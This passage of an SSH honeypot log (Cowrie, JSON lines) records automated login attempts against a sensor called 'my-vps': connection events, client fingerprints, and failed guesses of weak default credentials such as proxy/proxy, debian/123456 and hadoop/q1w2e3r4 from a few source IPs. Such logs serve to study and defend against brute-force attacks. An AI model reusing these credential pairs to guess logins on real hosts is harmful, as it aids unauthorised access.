01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:06.267313Z","src_ip":"212.227.125.160","session":"5cf0c2b9b048"}
{"eventid":"cowrie.login.failed","username":"proxy","password":"proxy","message":"login attempt [proxy/proxy] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:06.429062Z","src_ip":"212.227.125.160","session":"5cf0c2b9b048"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:06.832219Z","src_ip":"83.168.105.65","session":"a3db07118986"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:07.481628Z","src_ip":"212.227.125.160","session":"5cf0c2b9b048"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46804,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7a87c9828c4","protocol":"ssh","message":"New connection: 212.227.125.160:46804 (1.2.3.4:22) [session: e7a87c9828c4]","sensor":"my-vps","timestamp":"2025-08-26T11:32:12.089741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:12.091789Z","src_ip":"212.227.125.160","session":"e7a87c9828c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:12.143842Z","src_ip":"212.227.125.160","session":"e7a87c9828c4"}
{"eventid":"cowrie.login.failed","username":"labuser","password":"labuser","message":"login attempt [labuser/labuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:12.437538Z","src_ip":"212.227.125.160","session":"e7a87c9828c4"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:13.502740Z","src_ip":"212.227.125.160","session":"e7a87c9828c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47576,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fcac32d1da9","protocol":"ssh","message":"New connection: 212.227.125.160:47576 (1.2.3.4:22) [session: 9fcac32d1da9]","sensor":"my-vps","timestamp":"2025-08-26T11:32:18.077660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:18.078619Z","src_ip":"212.227.125.160","session":"9fcac32d1da9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:18.140983Z","src_ip":"212.227.125.160","session":"9fcac32d1da9"}
{"eventid":"cowrie.login.failed","username":"alex","password":"alex","message":"login attempt [alex/alex] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:18.326471Z","src_ip":"212.227.125.160","session":"9fcac32d1da9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:19.378124Z","src_ip":"212.227.125.160","session":"9fcac32d1da9"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":48296,"dst_ip":"1.2.3.4","dst_port":22,"session":"c93b0bf0e9c5","protocol":"ssh","message":"New connection: 83.168.105.65:48296 (1.2.3.4:22) [session: c93b0bf0e9c5]","sensor":"my-vps","timestamp":"2025-08-26T11:32:20.854402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:20.855934Z","src_ip":"83.168.105.65","session":"c93b0bf0e9c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:20.893107Z","src_ip":"83.168.105.65","session":"c93b0bf0e9c5"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"123456","message":"login attempt [svnuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:21.006415Z","src_ip":"83.168.105.65","session":"c93b0bf0e9c5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:22.046319Z","src_ip":"83.168.105.65","session":"c93b0bf0e9c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48342,"dst_ip":"1.2.3.4","dst_port":22,"session":"269ca3a80154","protocol":"ssh","message":"New connection: 212.227.125.160:48342 (1.2.3.4:22) [session: 269ca3a80154]","sensor":"my-vps","timestamp":"2025-08-26T11:32:23.678335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:23.679543Z","src_ip":"212.227.125.160","session":"269ca3a80154"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:23.730189Z","src_ip":"212.227.125.160","session":"269ca3a80154"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:23.889899Z","src_ip":"212.227.125.160","session":"269ca3a80154"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:24.959009Z","src_ip":"212.227.125.160","session":"269ca3a80154"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49104,"dst_ip":"1.2.3.4","dst_port":22,"session":"db82bddf31fb","protocol":"ssh","message":"New connection: 212.227.125.160:49104 (1.2.3.4:22) [session: db82bddf31fb]","sensor":"my-vps","timestamp":"2025-08-26T11:32:29.375948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:29.381961Z","src_ip":"212.227.125.160","session":"db82bddf31fb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:29.439430Z","src_ip":"212.227.125.160","session":"db82bddf31fb"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:29.685726Z","src_ip":"212.227.125.160","session":"db82bddf31fb"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:30.777679Z","src_ip":"212.227.125.160","session":"db82bddf31fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49830,"dst_ip":"1.2.3.4","dst_port":22,"session":"03cd107eee33","protocol":"ssh","message":"New connection: 212.227.125.160:49830 (1.2.3.4:22) [session: 03cd107eee33]","sensor":"my-vps","timestamp":"2025-08-26T11:32:36.148776Z"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":34858,"dst_ip":"1.2.3.4","dst_port":22,"session":"57a0b2b2bd7b","protocol":"ssh","message":"New connection: 83.168.105.65:34858 (1.2.3.4:22) [session: 57a0b2b2bd7b]","sensor":"my-vps","timestamp":"2025-08-26T11:32:36.390966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:36.391659Z","src_ip":"83.168.105.65","session":"57a0b2b2bd7b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:36.430994Z","src_ip":"83.168.105.65","session":"57a0b2b2bd7b"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:36.551038Z","src_ip":"83.168.105.65","session":"57a0b2b2bd7b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:36.584405Z","src_ip":"212.227.125.160","session":"03cd107eee33"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:36.585046Z","src_ip":"212.227.125.160","session":"03cd107eee33"}
{"eventid":"cowrie.login.failed","username":"nobody","password":"nobody","message":"login attempt [nobody/nobody] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:36.987790Z","src_ip":"212.227.125.160","session":"03cd107eee33"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:37.592369Z","src_ip":"83.168.105.65","session":"57a0b2b2bd7b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:38.039458Z","src_ip":"212.227.125.160","session":"03cd107eee33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50642,"dst_ip":"1.2.3.4","dst_port":22,"session":"4504ae0cba80","protocol":"ssh","message":"New connection: 212.227.125.160:50642 (1.2.3.4:22) [session: 4504ae0cba80]","sensor":"my-vps","timestamp":"2025-08-26T11:32:42.131001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:42.137084Z","src_ip":"212.227.125.160","session":"4504ae0cba80"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:42.183447Z","src_ip":"212.227.125.160","session":"4504ae0cba80"}
{"eventid":"cowrie.login.failed","username":"debian","password":"123456","message":"login attempt [debian/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:42.477533Z","src_ip":"212.227.125.160","session":"4504ae0cba80"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":36086,"dst_ip":"1.2.3.4","dst_port":22,"session":"a02984b59fa6","protocol":"ssh","message":"New connection: 196.251.86.249:36086 (1.2.3.4:22) [session: a02984b59fa6]","sensor":"my-vps","timestamp":"2025-08-26T11:32:42.820608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:43.438124Z","src_ip":"196.251.86.249","session":"a02984b59fa6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:32:43.438935Z","src_ip":"196.251.86.249","session":"a02984b59fa6"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:43.528240Z","src_ip":"212.227.125.160","session":"4504ae0cba80"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"q1w2e3r4","message":"login attempt [hadoop/q1w2e3r4] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:45.473109Z","src_ip":"196.251.86.249","session":"a02984b59fa6"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:47.185690Z","src_ip":"196.251.86.249","session":"a02984b59fa6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51414,"dst_ip":"1.2.3.4","dst_port":22,"session":"170b218e1c49","protocol":"ssh","message":"New connection: 212.227.125.160:51414 (1.2.3.4:22) [session: 170b218e1c49]","sensor":"my-vps","timestamp":"2025-08-26T11:32:47.716742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:47.731516Z","src_ip":"212.227.125.160","session":"170b218e1c49"}
